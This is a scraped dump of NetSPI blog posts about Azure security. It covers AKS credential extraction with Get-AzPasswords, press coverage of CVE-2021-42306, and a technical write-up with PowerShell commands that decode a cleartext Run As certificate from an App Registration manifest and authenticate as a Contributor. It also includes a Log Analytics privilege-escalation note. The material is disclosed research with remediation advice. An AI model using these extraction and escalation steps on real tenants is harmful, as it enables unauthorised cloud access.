For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (i.e., Key Vaults), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.
At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.
Gathering kubectl Credentials
As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.
Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.
Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.
Conclusion
As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.
For the defenders reading this, Microsoft Security Center should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:
- VMSS Command Execution
- Issuing of Metadata tokens for Managed Identities
- Generation of kubeconfig files
For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.
Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.
[post_title] => How To Extract Credentials from Azure Kubernetes Service (AKS) [post_excerpt] => In this penetration testing blog, we explain how to extract credentials from the Azure Kubernetes Service (AKS) using the Contributor role permissions on an AKS cluster. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extract-credentials-from-azure-kubernetes-service [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:22:34 [post_modified_gmt] => 2023-03-16 14:22:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27255 [menu_order] => 314 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 26753 [post_author] => 10 [post_date] => 2021-11-23 13:16:00 [post_date_gmt] => 2021-11-23 19:16:00 [post_content] =>On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. Read the full article below or online here.
Microsoft has fixed a flaw in Azure that, according to the infosec firm that found and privately reported the issue, could be exploited by a rogue user within an Azure Active Directory instance "to escalate up to a Contributor role."
"If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription," NetSPI said of the vulnerability, labeled CVE-2021-42306.
Essentially, an employee at a company using Azure Active Directory, for instance, could end up exploiting this bug to ruin an IT department or CISO's month. Microsoft said last week it fixed the problem within Azure:
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers.
We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
"The discovery of this vulnerability," said NetSPI's Karl Fosaaen, who found the security hole, "highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test."
[post_title] => The Register: Microsoft squashes Azure privilege-escalation bug [post_excerpt] => On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-register-microsoft-squashes-azure-privilege-escalation-bug [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:42 [post_modified_gmt] => 2022-12-16 16:51:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26753 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 26727 [post_author] => 10 [post_date] => 2021-11-18 18:47:00 [post_date_gmt] => 2021-11-19 00:47:00 [post_content] =>On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. Read the full article below or online here.
Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.
The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.
The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.
As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.
Affected products/services
Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.
Product/Service | Microsoft’s Mitigation | Customer impact assessment and remediation |
---|---|---|
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created | Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action. | Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately customers who bring their own certificates could be affected. This is regardless of the renewal date of the certificate. To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo. In addition, Azure Automation supports Managed Identities Support (GA announced on October 2021). Migrating to Managed Identities from Run-As will mitigate this issue. Please follow the guidance here to migrate. |
Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints. | Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications. Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action. | Azure Migrate appliances registered prior to 11/02/2021 and/or appliances registered after 11/02/2021 where auto-update was disabled could be affected by this issue. To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link. |
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints. | Azure Site Recovery deployed an update to prevent private keydata from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action. | Customers who have deployed and registered the preview version of VMware to Azure DR experience with ASR before 11/01/2021 could be affected. To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link. |
Azure AD applications and Service Principals [1] | Microsoft has blocked reading private key data as of 10/30/2021. | Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation. |
[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.
What else can I do to audit and investigate applications for unexpected use?
Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:
- Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
- If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
- Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
- Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
- For more information refer to the security operations guidance.
Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.
[post_title] => ChannelPro Network: Azure Active Directory (AD) KeyCredential Property Information Disclosure [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => channelpro-network-azure-active-directory-ad-keycredential-property-information-disclosure [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26727 [menu_order] => 344 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 26733 [post_author] => 10 [post_date] => 2021-11-18 17:26:00 [post_date_gmt] => 2021-11-18 23:26:00 [post_content] =>
On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. Read the full article below or online here.
Microsoft has recently addressed an information disclosure vulnerability, tracked as CVE-2021-42306, affecting Azure AD.
“An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.” reads the advisory published by Microsoft. “Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application. Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.”
The vulnerability was discovered by Karl Fosaaen from NetSPI, it received a CVSS score of 8.1. Fosaaen explained that due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and anyone with access to information on App Registrations can access them.
An attacker could use these credentials to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.
“This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.” reads the analysis published by NetSPI.
An attacker can exploit this flaw to escalate privileges to Contributor of any subscription that has an Automation Account, then access resources in the affected subscriptions, including sensitive information stored in Azure services and credentials stored in key vaults.
The issue could be potentially exploited to disable or delete resources and take entire Azure tenants offline.
Microsoft addressed the flaw by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been stored in clear text.
[post_title] => Security Affairs: Microsoft addresses a high-severity vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => security-affairs-microsoft-addresses-a-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26733 [menu_order] => 343 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 26728 [post_author] => 10 [post_date] => 2021-11-18 16:14:00 [post_date_gmt] => 2021-11-18 22:14:00 [post_content] =>On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. Read the full article below or online here.
Microsoft announced on Wednesday that it fixed an Azure Active Directory private key data storage gaffe that affects Azure application subscribers, but affected organizations nonetheless should carry out specific assessment and remediation tasks.
Affected organizations were notified via the Azure Service Health Notifications message center, Microsoft indicated.
"We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use."
The applications requiring investigation include Azure Automation (when used with "Run-As Accounts"), Azure Migrate, Azure Site Recovery, and Azure AD Applications and Service Principals. Microsoft didn't find evidence that the vulnerability was exploited, but advised organizations to conduct audits and investigate Azure apps for any permissions that may have been granted.
Microsoft also urged IT pros to enforce least-privilege access for apps and check the "sign-in logs, AAD audit logs and M365 audit logs for anomalous activity like sign-ins from unexpected IP addresses."
Private Key Data Exposed
The problem, in essence, was that Microsoft's Azure app installation processes were including private key data in a property used for public keys. The issue was initially flagged as CVE-2021-42306, an information disclosure vulnerability associated with Azure AD's keyCredentials property. Any user in an Azure AD tenancy can read the keyCredentials property, Microsoft's announcement explained:
The keyCredentials property is used to configure an application's authentication credentials. It is accessible to any user or service in the organization's Azure AD tenant with read access to application metadata.
The keyCredential's property is supposed to just work with public keys, but it was possible to store private key data in it, too, and that's where the Microsoft Azure app install processes blundered.
"Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers," Microsoft explained.
The Microsoft Security Response Center (MSRC) credited the discovery of the issue to "Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe," the announcement indicated.
Contributor Role Rights
The magnitude of the problem was explained in a NetSPI press release. NetSPI specializes in penetration testing and attack surface reduction services for organizations.
An exploit of the CVE-2021-42306 vulnerability could give an attacker Azure Contributor role rights, with the ability to "create, manage, and delete all types of resources in the affected Azure subscription," NetSPI explained. An attacker would have access to "all of the resources in the affected subscriptions," including "credentials stored in key vaults."
NetSPI's report on the vulnerability, written by Karl Fosaaen, NetSPI's practice director, described the response by the MSRC as "one of the fastest" he's seen. Fosaaen had initially sent his report to the MSRC on Oct. 7, 2021.
Fosaaen advised following MSRC's advice, but added a cautionary note.
"Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account 'Run as' certificates," he wrote. "Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised."
Microsoft offers a script from this GitHub page that will check for affected apps, as noted by Microsoft Program Manager Merill Fernando in this Twitter post.
[post_title] => Redmond: Microsoft Fixes Azure Active Directory Issue Exposing Private Key Data [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => redmond-microsoft-fixes-azure-active-directory-issue-exposing-private-key-data [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26728 [menu_order] => 345 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 26730 [post_author] => 10 [post_date] => 2021-11-18 15:19:00 [post_date_gmt] => 2021-11-18 21:19:00 [post_content] =>On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Octavio Mares for Information Security Newspaper. Read the full article below or online here.
This week, Microsoft reported the detection of a sensitive information leak vulnerability that affects many Azure Active Directory (AD) deployments. The flaw was tracked as CVE-2021-42306 and received a score of 8.1/10 according to the Common Vulnerability Scoring System (CVSS).
According to the report, incorrect configuration in Azure allows “Run As” credentials in the automation account to be stored in plain text, so any user with access to application registration information could access this information, including threat actors.
The flaw was identified by researchers at cybersecurity firm NetSPI, who mention that an attacker could exploit this condition to perform privilege escalation on any affected implementation. The risk is also present for credentials stored in key vaults and any information stored in Azure services, experts say.
Apparently, the flaw is related to the keyCredentials property, designed to configure authentication credentials for applications. Microsoft said: “Some Microsoft services incorrectly store private key data in keyCredentials while building applications on behalf of their customers. At the moment there is no evidence of malicious access to this data.”
The company notes that the vulnerability was fixed by preventing Azure services from storing private keys in plain text in keyCredentials, as well as preventing users from accessing any private key data incorrectly stored in this format: “Private keys in keyCredentials are inaccessible, which mitigates the risk associated with storing this information,” Microsoft concludes.
Microsoft also mentions that all Automation Run As accounts that were created with Azure Automation certificates between October 15, 2020 and October 15, 2021 are affected by this flaw. Azure Migrate services and customers who deployed VMware preview in the Azure disaster recovery experience with Azure Site Recovery (ASR) could also be vulnerable.
To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.
[post_title] => Information Security Newspaper: Very Critical Information Disclosure Vulnerability in Azure Active Directory (AD). Patch Immediately [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => information-security-newspaper-very-critical-information-disclosure-vulnerability-in-azure-active-directory-ad-patch-immediately [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26730 [menu_order] => 346 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 26710 [post_author] => 10 [post_date] => 2021-11-18 14:34:36 [post_date_gmt] => 2021-11-18 20:34:36 [post_content] =>On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. Read the full article below or online here.
A critical Azure Active Directory vulnerability (CVE-2021-42361) left user credentials stored in easily accessible plain text – a bug that could have let attackers make themselves a contributor to the affected Azure AD subscription, creating, managing and deleting resources across the cloud-based IAM service; which, abused, hands a potentially terrifying amount of control to any bad actor who’s gained access.
The Azure Active Directory vulnerability resulted in private key data being stored in plaintext by four key Azure services in the keyCredentials property of an Azure AD application. (The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata, Microsoft noted in its write-up.)
Azure Automation, Azure Migrate, Azure Site Recovery and Azure applications and Service Principals were all storing their private keys visibily in the public property Microsoft admitted.
“Automation Account ‘Run as’ credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users)” said attack surface management specialist NetSPI.
The bug was spotted and reported by security firm NetSPI’s practice director Karl Fosaaen.
(His technically detailed write-up can be seen here.)
Microsoft gave it a CVSS score of 8.1 and patched it on November 17 in an out-of-band security update.
Impacted Azure services have now deployed updates that prevent clear text private key data from being stored during application creation, and Azure AD deployed an update that prevents access to private key data that has previously been stored. NetSPI’s Fosaaen warned however that “although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account ‘Run as’ certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.”
There’s no evidence that the bug has been publicly exploited and it would require basic authorisation, but for a motivated attacker it would have represented a significant weapon in their cloud-exploitation arsenal and raises questions about QA at Microsoft given the critical nature of the exposure.
Microsoft described the Azure Active Directory vulnerability in its security update as “an information disclosure vulnerability [that] manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential on an Azure AD Application or Service Principal….
“This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application” it added.
In a separate blog by Microsoft Security Response Center the company noted that “access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal” — something illustrated and automated by NetSPI’s Karl Fosaaen.
It’s not Azure’s first serious security issue this year: security researchers at Israel’s Wix in August 2021 found a critical vulnerability in its flagship CosmosDB database that gave them full admin access for major Microsoft customers including several Fortune 500 multinationals. They warned at the time that the “series of flaws in a Cosmos DB feature created a loophole allowing any user to download, delete or manipulate a massive collection of commercial databases, as well as read/write access to the underlying architecture of Cosmos DB.”
[post_title] => The Stack: “Keys to the cloud” stored in plain text in Azure AD in major hyperscaler blooper [post_excerpt] => On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-stack-keys-to-the-cloud-stored-in-plain-text-in-azure-ad-in-major-hyperscaler-blooper [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26710 [menu_order] => 347 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 26684 [post_author] => 10 [post_date] => 2021-11-17 14:13:03 [post_date_gmt] => 2021-11-17 20:13:03 [post_content] =>Introduction
Occasionally, we find something in an environment that just looks off. It’s not always abundantly clear why it looks wrong, but clear that a deeper understanding is required. This was the case with seeing Base64 certificate data (“MII…” strings) stored with App Registration “manifests” in Azure Active Directory.
In this blog, we will share the technical details on how we found and reported CVE-2021-42306 (CredManifest) to Microsoft. In addition to Microsoft’s remediation guidance, we’ll explain the remediation steps organizations can take to protect their Azure environments.
So, what does this mean for your organization? Read our press release to explore the business impact of the issue.
TL;DR
Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users). These credentials could then be used to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.
The Source of the Issue
This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.
We can see this by creating a new Automation Account with a “Run as” account in our test tenant. As an integrated part of this process, we are assigning the Contributor role to the “Run as” account, so we will need to use an account with the Owner role to complete this step. We will use the “BlogExample” Automation Account as our example:
Take note that we are also selecting the “Create Azure Run As account” setting as “Yes” for this example. This will create a new service principal account that the Automation Account can use within running scripts. By default, this service principal will also be granted the Contributor role on the subscription that the Automation Account is created in.
We’ve previously covered Automation Accounts on the NetSPI technical blog, so hopefully this is all a refresher. For additional information on Azure Automation Accounts, read:
- Get-AzPasswords: Encrypting Automation Password Data
- Maintaining Azure Persistence via Automation Accounts
- Using Azure Automation Accounts to Access Key Vaults
Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.
By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.
The “value” parameter is the Base64 encoded string containing the PFX certificate file that can be used for authentication. Before we can authenticate as the App Registration, we will need to convert the Base64.
Manual Extraction of the Credentials
For the proof of concept, we will copy the certificate data out of the manifest and convert it to a PFX file.
This can be done with two lines of PowerShell:
$testcred = "MIIJ/QIBAzCCC[Truncated]=" [IO.File]::WriteAllBytes("$PWD\BlogCert.pfx",[Convert]::FromBase64String($testcred))
This will decode the certificate data to BlogCert.pfx in your current directory.
Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session):
Import-PfxCertificate -FilePath "$PWD\BlogCert.pfx" -CertStoreLocation Cert:\LocalMachine\My
Finally, we can use the newly installed certificate to authenticate to the Azure subscription as the App Registration. This will require us to know the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint for the App Registration credentials. These can be found in the “Overview” menu for the App Registration and the Manifest.
In this example, we’ve cast these values to PowerShell variables ($thumbprint, $tenantID, $appId).
With these values available, we can then run the Add-AzAccount command to authenticate to the tenant.
Add-AzAccount -ServicePrincipal -Tenant $tenantID -CertificateThumbprint $thumbprint -ApplicationId $appId
As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.
Automating Extraction
Since we’re penetration testers and want to automate all our attacks, we wrote up a script to help identify additional instances of this issue in tenants. The PowerShell script uses the Graph API to gather the manifests from AAD and extract the credentials out to files.
The script itself is simple, but it uses the following logic:
- Get a token and query the following endpoint for App Registration information - “https://graph.microsoft.com/v1.0/myorganization/applications/”
- For each App Registration, check the “keyCredentials” value for data and write it to a file
- Use the Get-PfxData PowerShell function to validate that it’s a PFX file
- Delete any non-PFX files and log the display name and ID for affected App Registrations to a file for tracking
Impact
For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration.
By gaining access to the App Registration credential, my new user could then authenticate to the subscription as the Contributor role for the subscription. This is an impactful privilege escalation, as it would allow any user in this environment to escalate to Contributor of any subscription with an Automation Account.
For additional reference, Microsoft’s documentation for default user permissions indicates that this is expected behavior for all member users in AAD: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/users-default-permissions.
Remediation Steps
Below is a detailed overview of how I remediated the issue in a client environment, prior to Microsoft’s fix:
When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.
One important remediation step to note here is the removal of the previous certificate. If the previous credential has not yet expired it will still be viable for authentication. To fully remediate the issue, the new certificate must be generated, and the old certificate will need to be removed from the App Registration.
Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.
I worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure materials online here.
A representative from MSRC shared the following details with NetSPI regarding the remediation steps taken by Microsoft:
- Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation.
- Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored.
- Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.
Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.
Summary
This was one of the fastest issues that I’ve seen go through the MSRC pipeline. I really appreciate the quick turnaround and open lines of communication that we had with the MSRC team. They were really great to work with on this issue.
Below is the timeline for the vulnerability:
- 10/07/2021 – Initial report submitted to MSRC
- 10/08/2021 – MSRC assigns a case number to the submission
- October of 2021 – Back and forth emails and clarification with MSRC
- 10/29/2021 – NetSPI confirms initial MSRC remediation
- 11/17/2021 – Public Disclosure
While this was initially researched in a test environment, this issue was quickly escalated once we identified it in client environments. We want to extend special thanks to the clients that worked with us in identifying the issue in their environment and their willingness to let us do a spot check for an unknown vulnerability.
Looking for an Azure cloud pentesting partner? Connect with NetSPI: https://www.netspi.com/contact-us/
Addendum
NetSPI initially discovered this issue with Automation Account "Run as" certificates. MSRC's blog post details that two additional services were affected: Azure Migrate and Azure Site Recovery. These two services also create App Registrations in Azure Active Directory and were affected by the same issue which caused private keys to be stored in App Manifests. It is also possible that manually created Azure AD applications and Service Principals had private keys stored in the same manner.
We recommend taking the same remediation steps for any service principals associated with these services. Microsoft has published tooling to help identify and remediate the issue in each of these scenarios. Their guides and scripts are available here: https://github.com/microsoft/aad-app-credential-tools
NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:
As companies move more and more of their infrastructure to the cloud, they're forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.
It's no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.
But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.
Going beyond certifications
All of these certs are good ways to demonstrate your skills to your current or potential future employers — they're "a good way to get your foot in the door at a company doing cloud security and they're good for getting past a resume filter," says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren't a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.
"Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform," Fosaaen continues. "Many of the currently available certifications only require people to memorize terminology, so you don't have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you're going the extra level to make sure the candidates really do understand the cloud providers that your organization uses."
Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute's Cloud Penetration Testing course, BHIS's Breaching The Cloud Perimeter, or his own company's Dark Side Ops Training. Concrete training courses like these can be a great complement to the "book learning" of a certification.
To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html
[post_title] => CSO: 8 top cloud security certifications [post_excerpt] => NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-cloud-security-certifications [to_ping] => [pinged] => [post_modified] => 2024-04-02 08:50:37 [post_modified_gmt] => 2024-04-02 13:50:37 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26468 [menu_order] => 366 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.
The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.
Based off the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.
Escalating Azure Permissions
Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.
